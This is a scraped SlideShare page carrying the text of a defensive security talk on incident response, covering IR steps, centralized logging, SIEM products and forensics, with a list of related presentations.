SlideShare a Scribd company logo

Incident response before:after breach

Sumedt Jitpukdebodin
Sumedt Jitpukdebodin

Describe what is required for incident response in company

Technology
1 of 44
Download to read offline
Incident Response Operation Before/After Hacked Sumedt Jitpukdebodin Senior Security Researcher @ I-SECURE Co. Ltd. LPIC-1, NCLA, C|EHv6, eCPPT, eWPT, CompTIA Security+, IWSS, CPTE
# whoami • Name: Sumedt Jitpukdebodin • Jobs: Security Consultant, Senior Security Researcher @ I- SECURE • Website: www.r00tsec.com, www.techsuii.com • Admin: @2600thailand, @OWASPThailand • Book: Network Security Book • Hobby: Writing, Hacking, Researching, Gaming, etc. • My article: please search google with my name.
Hacker
SOC(Security Operation Center)
Attacker And Defender Catch me if you can
# id • Hack is easy, defend is so f*cking hard. • Surfaces • 0day • Social Engineering • Etc.
Incident Response
# man ir
Definition • Event - Activity that we monitor (Log) • Incident - the damage event. • Incident Response(IR) - Actions taken subsequent to an incident to understand the incident and take remedial action
Top Priority for IR. • Identify the problems • Fix the problems. • Recovery system back to normal.
Step of IR. Source:: http://www.emrisk.com/sites/default/files/images/newsletters/Incident%20Response%20Cycle.png
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
Before Breach Source:: http://jokideo.com/wp-content/uploads/2013/03/Funny-cat-Come-on-birdy.jpg
Centralized Log Diagram Source:: http://www.sysadmin.in.th/course/LogFiles/Centralized_Logs_Server_by_SysAdmin.jpg
# whereis logs • Device Log • Server Log • Application Log
# ls /var/log/ • web_server/{access.log,error.log} • audit/audit.log • syslog • openvpn.log
# cat /var/log/apache2/access.log
# cat /var/log/syslog
Devices • Firewall • IDS/IPS • Next Generation Firewall • Mail Gateway • Etc.
Centralized Log • Syslog-ng(rsyslog) • Splunk • Graylog2 • logstrash • Scribe
Example of Splunk
SIEM(“Security Information and Event Management") • Arcsight • Log Correlation Engine By Tenable • Splunk • OSSIM ** • Alienvault ** • LOGalyze ** • Etc.
Log Correlation Engine By Tenable Source:: http://www.tenable.com/blog/log-correlation-engine-36-now-with-its-own-gui
Arcsight Source:: http://blog.rootshell.be/2013/06/26/out-of-the-box-siem-never/
Arcsight Dashboard Source:: http://www.observeit.com/images/content/features_siem14.jpg
False Positive
SQL Injection Case • Alert: SQL Injection • Attacker: China • Log From: Web Application Firewall
SQL Injection Case
After Breach Source:: http://www.dumpaday.com/wp-content/uploads/2013/01/funny- cat-bath.jpg
Forensic
Forensic • Containment • Ensure that the system(s) and network are protected from further risk. • Isolate the compromised system(s) • Eradication • How they got in • Where they went • What they did • The removal of malware • Patching Vulnerability • Identifying vulnerability • Improve network and system countermeasures
Forensic • Containment • Ensure that the system(s) and network are protected from further risk. • Isolate the compromised system(s) • Eradication • How they got in • Where they went • What they did • The removal of malware • Patching Vulnerability • Identifying vulnerability • Improve network and system countermeasures
Recovery(Restore/Rebuild) • Restore status of service to normal • System owners decide based on advice from incident handling team - Business Decision. • Monitor the service after recovery • Performance • Anomalies
Lesson Learned • Detail of incident report • Communicate to others on the team • Apply fixes in environment • Conduct a performance analysis of the overall incident and improve operations • “Not!!!!” Blaming people • Review/Rewrite Policy • Determines cost of incident • Apply lesson learned to the entire entity • Budget for, install, and maintain protection software
Incident response before:after breach

Recommended

Soc analyst course content
Soc analyst course contentSoc analyst course content
Soc analyst course contentShivamSharma909
 
Windows 7 forensics event logs-dtl-r3
Windows 7 forensics event logs-dtl-r3Windows 7 forensics event logs-dtl-r3
Windows 7 forensics event logs-dtl-r3CTIN
 
Windows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for InvestigationWindows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for InvestigationMahendra Pratap Singh
 
QRadar, ArcSight and Splunk
QRadar, ArcSight and Splunk QRadar, ArcSight and Splunk
QRadar, ArcSight and Splunk M sharifi
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Incident response
Incident responseIncident response
Incident responseAnshul Gupta
 
McAfee SIEM solution
McAfee SIEM solution McAfee SIEM solution
McAfee SIEM solution hashnees
 
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnov
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnovComputer Forensics: First Responder Training - Eric Vanderburg - JurInnov
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnovEric Vanderburg
 

Recommended

Soc analyst course content
Soc analyst course contentSoc analyst course content
Soc analyst course contentShivamSharma909
 
Windows 7 forensics event logs-dtl-r3
Windows 7 forensics event logs-dtl-r3Windows 7 forensics event logs-dtl-r3
Windows 7 forensics event logs-dtl-r3CTIN
 
Windows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for InvestigationWindows Event Analysis - Correlation for Investigation
Windows Event Analysis - Correlation for InvestigationMahendra Pratap Singh
 
QRadar, ArcSight and Splunk
QRadar, ArcSight and Splunk QRadar, ArcSight and Splunk
QRadar, ArcSight and Splunk M sharifi
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Incident response
Incident responseIncident response
Incident responseAnshul Gupta
 
McAfee SIEM solution
McAfee SIEM solution McAfee SIEM solution
McAfee SIEM solution hashnees
 
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnov
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnovComputer Forensics: First Responder Training - Eric Vanderburg - JurInnov
Computer Forensics: First Responder Training - Eric Vanderburg - JurInnovEric Vanderburg
 
Cybersecurity Roadmap Development for Executives
Cybersecurity Roadmap Development for ExecutivesCybersecurity Roadmap Development for Executives
Cybersecurity Roadmap Development for ExecutivesKrist Davood - Principal - CIO
 
SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?Jonathan Sinclair
 
IBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence OverviewIBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence OverviewCamilo Fandiño Gómez
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmPriyanka Aash
 
Building an effective Information Security Roadmap
Building an effective Information Security RoadmapBuilding an effective Information Security Roadmap
Building an effective Information Security RoadmapElliott Franklin
 
Integrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity CollaborationIntegrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity CollaborationPriyanka Aash
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM ArchitectureNishanth Kumar Pathi
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
IBM Security QRadar
IBM Security QRadar IBM Security QRadar
IBM Security QRadarVirginia Fernandez
 
Siem ppt
Siem pptSiem ppt
Siem pptkmehul
 
Security Information and Event Managemen
Security Information and Event ManagemenSecurity Information and Event Managemen
Security Information and Event ManagemenS Periyakaruppan CISM,ISO31000,C-EH,ITILF
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Understanding the Event Log
Understanding the Event LogUnderstanding the Event Log
Understanding the Event Logchuckbt
 
Incident response methodology
Incident response methodologyIncident response methodology
Incident response methodologyPiyush Jain
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)Ahmad Haghighi
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhydn|u - The Open Security Community
 
SOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCSOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCPriyanka Aash
 
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...Lumension
 
Locking down server and workstation operating systems
Locking down server and workstation operating systemsLocking down server and workstation operating systems
Locking down server and workstation operating systemsBen Rothke
 

More Related Content

What's hot

SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?Jonathan Sinclair
 
IBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence OverviewIBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence OverviewCamilo Fandiño Gómez
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmPriyanka Aash
 
Building an effective Information Security Roadmap
Building an effective Information Security RoadmapBuilding an effective Information Security Roadmap
Building an effective Information Security RoadmapElliott Franklin
 
Integrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity CollaborationIntegrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity CollaborationPriyanka Aash
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivitySqrrl
 
Siem ppt
Siem pptSiem ppt
Siem pptkmehul
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Understanding the Event Log
Understanding the Event LogUnderstanding the Event Log
Understanding the Event Logchuckbt
 
Incident response methodology
Incident response methodologyIncident response methodology
Incident response methodologyPiyush Jain
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)Ahmad Haghighi
 
SOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCSOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCPriyanka Aash
 

What's hot (20)

Cybersecurity Roadmap Development for Executives
Cybersecurity Roadmap Development for ExecutivesCybersecurity Roadmap Development for Executives
Cybersecurity Roadmap Development for Executives
 
SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?SOC: Use cases and are we asking the right questions?
SOC: Use cases and are we asking the right questions?
 
IBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence OverviewIBM QRadar Security Intelligence Overview
IBM QRadar Security Intelligence Overview
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
From SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity ChasmFrom SIEM to SOC: Crossing the Cybersecurity Chasm
From SIEM to SOC: Crossing the Cybersecurity Chasm
 
Building an effective Information Security Roadmap
Building an effective Information Security RoadmapBuilding an effective Information Security Roadmap
Building an effective Information Security Roadmap
 
Integrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity CollaborationIntegrated Security Operations Center (ISOC) for Cybersecurity Collaboration
Integrated Security Operations Center (ISOC) for Cybersecurity Collaboration
 
SIEM Architecture
SIEM ArchitectureSIEM Architecture
SIEM Architecture
 
Threat Hunting for Command and Control Activity
Threat Hunting for Command and Control ActivityThreat Hunting for Command and Control Activity
Threat Hunting for Command and Control Activity
 
IBM Security QRadar
IBM Security QRadar IBM Security QRadar
IBM Security QRadar
 
Siem ppt
Siem pptSiem ppt
Siem ppt
 
Security Information and Event Managemen
Security Information and Event ManagemenSecurity Information and Event Managemen
Security Information and Event Managemen
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Understanding the Event Log
Understanding the Event LogUnderstanding the Event Log
Understanding the Event Log
 
Incident response methodology
Incident response methodologyIncident response methodology
Incident response methodology
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
 
Security Information Event Management - nullhyd
Security Information Event Management - nullhydSecurity Information Event Management - nullhyd
Security Information Event Management - nullhyd
 
SOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOCSOC Architecture - Building the NextGen SOC
SOC Architecture - Building the NextGen SOC
 

Viewers also liked

Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...Lumension
 
Locking down server and workstation operating systems
Locking down server and workstation operating systemsLocking down server and workstation operating systems
Locking down server and workstation operating systemsBen Rothke
 
Using Logs for Breach Investigations and Incident Response by Dr Anton Chuvakin
Using Logs for Breach Investigations and Incident Response by Dr Anton ChuvakinUsing Logs for Breach Investigations and Incident Response by Dr Anton Chuvakin
Using Logs for Breach Investigations and Incident Response by Dr Anton ChuvakinAnton Chuvakin
 
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?SolarWinds Patch Manager - How does it compare to SCCM Patch Management?
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?SolarWinds
 
Anton Chuvakin FTP Server Intrusion Investigation
Anton Chuvakin FTP Server Intrusion InvestigationAnton Chuvakin FTP Server Intrusion Investigation
Anton Chuvakin FTP Server Intrusion InvestigationAnton Chuvakin
 
Server Management
Server ManagementServer Management
Server ManagementDell World
 
How to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall AuditHow to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall Auditkeyuradmin
 
Firewall Penetration Testing
Firewall Penetration TestingFirewall Penetration Testing
Firewall Penetration TestingChirag Jain
 
Security Operation Center - Design & Build
Security Operation Center - Design & BuildSecurity Operation Center - Design & Build
Security Operation Center - Design & BuildSameer Paradia
 
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...Amazon Web Services
 
Water conservation ppt
Water conservation pptWater conservation ppt
Water conservation pptbinnyaji
 

Viewers also liked (15)

Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
Beyond Windows Patching: Dealing with the New Imperative to Patch Adobe, Appl...
 
Locking down server and workstation operating systems
Locking down server and workstation operating systemsLocking down server and workstation operating systems
Locking down server and workstation operating systems
 
Using Logs for Breach Investigations and Incident Response by Dr Anton Chuvakin
Using Logs for Breach Investigations and Incident Response by Dr Anton ChuvakinUsing Logs for Breach Investigations and Incident Response by Dr Anton Chuvakin
Using Logs for Breach Investigations and Incident Response by Dr Anton Chuvakin
 
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?SolarWinds Patch Manager - How does it compare to SCCM Patch Management?
SolarWinds Patch Manager - How does it compare to SCCM Patch Management?
 
Anton Chuvakin FTP Server Intrusion Investigation
Anton Chuvakin FTP Server Intrusion InvestigationAnton Chuvakin FTP Server Intrusion Investigation
Anton Chuvakin FTP Server Intrusion Investigation
 
Server Management
Server ManagementServer Management
Server Management
 
How to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall AuditHow to Audit Firewall, what are the standard Practices for Firewall Audit
How to Audit Firewall, what are the standard Practices for Firewall Audit
 
Wsus best practices
Wsus best practicesWsus best practices
Wsus best practices
 
Firewall Penetration Testing
Firewall Penetration TestingFirewall Penetration Testing
Firewall Penetration Testing
 
Save water
Save waterSave water
Save water
 
Save water Save Life!
Save water Save Life!Save water Save Life!
Save water Save Life!
 
Fortigate Training
Fortigate TrainingFortigate Training
Fortigate Training
 
Security Operation Center - Design & Build
Security Operation Center - Design & BuildSecurity Operation Center - Design & Build
Security Operation Center - Design & Build
 
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...
AWS re:Invent 2016: How to Manage Inventory, Patching, and System Images for ...
 
Water conservation ppt
Water conservation pptWater conservation ppt
Water conservation ppt
 

Similar to Incident response before:after breach

2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
All Your Security Events Are Belong to ... You!
All Your Security Events Are Belong to ... You!All Your Security Events Are Belong to ... You!
All Your Security Events Are Belong to ... You!Xavier Mertens
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEChris Gates
 
IT security for all. Bootcamp slides
IT security for all. Bootcamp slidesIT security for all. Bootcamp slides
IT security for all. Bootcamp slidesWallarm
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3ShivamSharma909
 
H@dfex 2015 malware analysis
H@dfex 2015 malware analysisH@dfex 2015 malware analysis
H@dfex 2015 malware analysisCharles Lim
 
SECURITY OPERATION CENTER CONTENT.pptx
SECURITY OPERATION CENTER CONTENT.pptxSECURITY OPERATION CENTER CONTENT.pptx
SECURITY OPERATION CENTER CONTENT.pptxFarzanMansoor1
 
When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail YouMichael Gough
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingAndrew McNicol
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active DefenseGreg Foss
 
Perforce on Tour 2015 - How are You Protecting Your Source Code?
Perforce on Tour 2015 - How are You Protecting Your Source Code?Perforce on Tour 2015 - How are You Protecting Your Source Code?
Perforce on Tour 2015 - How are You Protecting Your Source Code?Perforce
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Paul Haskell-Dowland
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityClaus Cramon Houmann
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handlingnewbie2019
 
Application Security within Agile
Application Security within AgileApplication Security within Agile
Application Security within AgileNetlight Consulting
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Claus Cramon Houmann
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory ForensicsIIJ
 

Similar to Incident response before:after breach (20)

2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
All your logs are belong to you!
All your logs are belong to you!All your logs are belong to you!
All your logs are belong to you!
 
All Your Security Events Are Belong to ... You!
All Your Security Events Are Belong to ... You!All Your Security Events Are Belong to ... You!
All Your Security Events Are Belong to ... You!
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
IT security for all. Bootcamp slides
IT security for all. Bootcamp slidesIT security for all. Bootcamp slides
IT security for all. Bootcamp slides
 
Soc analyst course content v3
Soc analyst course content v3Soc analyst course content v3
Soc analyst course content v3
 
H@dfex 2015 malware analysis
H@dfex 2015 malware analysisH@dfex 2015 malware analysis
H@dfex 2015 malware analysis
 
SECURITY OPERATION CENTER CONTENT.pptx
SECURITY OPERATION CENTER CONTENT.pptxSECURITY OPERATION CENTER CONTENT.pptx
SECURITY OPERATION CENTER CONTENT.pptx
 
When Security Tools Fail You
When Security Tools Fail YouWhen Security Tools Fail You
When Security Tools Fail You
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active Defense
 
Perforce on Tour 2015 - How are You Protecting Your Source Code?
Perforce on Tour 2015 - How are You Protecting Your Source Code?Perforce on Tour 2015 - How are You Protecting Your Source Code?
Perforce on Tour 2015 - How are You Protecting Your Source Code?
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark Arts
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
Chapter 15 incident handling
Chapter 15 incident handlingChapter 15 incident handling
Chapter 15 incident handling
 
Application Security within Agile
Application Security within AgileApplication Security within Agile
Application Security within Agile
 
Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2Presentation infra and_datacentrre_dialogue_v2
Presentation infra and_datacentrre_dialogue_v2
 
Malware Analysis
Malware AnalysisMalware Analysis
Malware Analysis
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 

More from Sumedt Jitpukdebodin

How to create your own hack environment
How to create your own hack environmentHow to create your own hack environment
How to create your own hack environmentSumedt Jitpukdebodin
 
Web architecture mechanism and threats
Web architecture mechanism and threatsWeb architecture mechanism and threats
Web architecture mechanism and threatsSumedt Jitpukdebodin
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?Sumedt Jitpukdebodin
 
Web Architecture - Mechanism and Threats
Web Architecture - Mechanism and ThreatsWeb Architecture - Mechanism and Threats
Web Architecture - Mechanism and ThreatsSumedt Jitpukdebodin
 

More from Sumedt Jitpukdebodin (14)

How to create your own hack environment
How to create your own hack environmentHow to create your own hack environment
How to create your own hack environment
 
Phishing
PhishingPhishing
Phishing
 
Which side are you
Which side are youWhich side are you
Which side are you
 
Endpoint is not enough
Endpoint is not enoughEndpoint is not enough
Endpoint is not enough
 
Antivirus is hopeless
Antivirus is hopelessAntivirus is hopeless
Antivirus is hopeless
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
 
R u hacked
R u hackedR u hacked
R u hacked
 
Web architecture mechanism and threats
Web architecture mechanism and threatsWeb architecture mechanism and threats
Web architecture mechanism and threats
 
Fundamental of malware analysis
Fundamental of malware analysisFundamental of malware analysis
Fundamental of malware analysis
 
Security awareness training
Security awareness trainingSecurity awareness training
Security awareness training
 
Hacking with paper
Hacking with paperHacking with paper
Hacking with paper
 
DDoS handlering
DDoS handleringDDoS handlering
DDoS handlering
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
Web Architecture - Mechanism and Threats
Web Architecture - Mechanism and ThreatsWeb Architecture - Mechanism and Threats
Web Architecture - Mechanism and Threats
 

Recently uploaded

Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
